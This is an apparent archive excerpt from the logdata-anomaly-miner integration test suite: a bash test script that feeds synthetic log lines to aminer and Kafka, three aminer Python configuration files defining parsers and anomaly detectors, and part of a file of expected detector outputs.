$AUTH #ADD HERE #stop aminer sleep 3 sudo pkill -x aminer wait $PID checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." exit 1 fi else echo "" echo "test failed at checking syslogs.." 
exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi echo "" echo "part 1 finished" echo "" #END AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null sudo cp ../unit/data/kafka-client.conf /etc/aminer/kafka-client.conf wait $DOWNLOAD_PID tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 1 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sleep 1 COUNTER=0 #start aminer sudo aminer -C --config $CFG_PATH22 -f > $OUT & PID=$! sleep 8 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG sleep 2 #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH sleep 2 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 2 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 2 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 2 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk 
upgrade") >> $AUTH sleep 2 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 2 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH sleep 2 #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG sleep 2 #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH #ADD HERE #stop aminer sleep 12 sudo pkill -x aminer wait $PID sleep 3 # leave the kafka handler some time. result=0 checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then checkKafkaTopic if [ $? == 0 ]; then echo "" echo "all kafka outputs were found!" echo "finished test successfully.." else echo "" echo "test failed at checking kafka topic.." result=1 fi else echo "" echo "test failed at checking mails.." result=1 fi else echo "" echo "test failed at checking syslogs.." result=1 fi else echo "" echo "test failed at checking outputs.." result=1 fi echo "" echo "part 2 finished" sudo $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null sudo $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf exit $result logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/config.py000066400000000000000000000172271437606560100251600ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! 
Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. 
Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. 
""" # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. 
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. 
from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/config21.py000066400000000000000000000202341437606560100253130ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. 
# config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". 
# Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some 
generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) analysis_context.register_component(simple_multisource_atom_sync, component_name="SimpleMultisourceAtomSync") # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/config22.py000066400000000000000000000211201437606560100253070ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. 
However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. 
Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. 
""" # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement import datetime from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S', datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.KafkaEventHandler import KafkaEventHandler kafka_event_handler = KafkaEventHandler(analysis_context, 'test_topic', { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) from aminer.events.JsonConverterHandler import JsonConverterHandler json_converter_handler = JsonConverterHandler([kafka_event_handler], analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler, json_converter_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers, default_timestamp_path_list=['model/DiskUpgrade/Date']) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/declarations.sh000077500000000000000000000524621437606560100263500ustar00rootroot00000000000000#!/bin/bash source ../config # declare all expected values without the variable ones. These arrays are used to compare with the incoming log lines. 
declare -a NEW_PATH_HD_REPAIR_1=(" New path(es) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/DiskUpgrade: " ": System rebooted for hard disk upgrade" " /model/DiskUpgrade/DTM: " " /model/DiskUpgrade/UNameSpace1: " " /model/DiskUpgrade/UName: " " /model/DiskUpgrade/UNameSpace2: " " /model/DiskUpgrade/User: " " /model/DiskUpgrade/HDRepair: System rebooted for hard disk upgrade" "['/model/DiskUpgrade', '/model/DiskUpgrade/DTM', '/model/DiskUpgrade/UNameSpace1', '/model/DiskUpgrade/UName', '/model/DiskUpgrade/UNameSpace2', '/model/DiskUpgrade/User', '/model/DiskUpgrade/HDRepair']" "Original log line: ") declare -a UNPARSED_ATOM_1=(" Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" " System rebooted for hard disk upgrad") declare -a UNPARSED_ATOM_2=(" Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" ": System rebooted for hard disk upgrade") declare -a NEW_PATH_HOME_PATH_ROOT_1=(" New path(es) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/HomePath: The Path of the home directory shown by pwd of the user root is: /root" " /model/HomePath/Pwd: The Path of the home directory shown by pwd of the user " " /model/HomePath/Username: root" " /model/HomePath/Is: is: " " /model/HomePath/Path: /root" "['/model/HomePath', '/model/HomePath/Pwd', '/model/HomePath/Username', '/model/HomePath/Is', '/model/HomePath/Path']" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1=(" New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'root', b'/root')" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_USER_1=(" New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'user', b'/home/user')" "Original log line: The Path of 
the home directory shown by pwd of the user user is: /home/user") declare -a NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1=(" New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'guest', b'/home/guest')" "Original log line: The Path of the home directory shown by pwd of the user guest is: /home/guest") declare -a JSON_OUTPUT=() read -r -d '' VAR << END { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(es) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/DiskUpgrade", "/model/DiskUpgrade/DTM", "/model/DiskUpgrade/UNameSpace1", "/model/DiskUpgrade/UName", "/model/DiskUpgrade/UNameSpace2", "/model/DiskUpgrade/User", "/model/DiskUpgrade/HDRepair" ] }, "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/DiskUpgrade": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ", "/model/DiskUpgrade/DTM": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END "/model/DiskUpgrade/UNameSpace1": " ", "/model/DiskUpgrade/UName": "localhost", "/model/DiskUpgrade/UNameSpace2": 
" ", "/model/DiskUpgrade/User": "root:", "/model/DiskUpgrade/HDRepair": " System rebooted for hard disk upgrade" } } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(es) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath", "/model/HomePath/Pwd", "/model/HomePath/Username", "/model/HomePath/Is", "/model/HomePath/Path" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the 
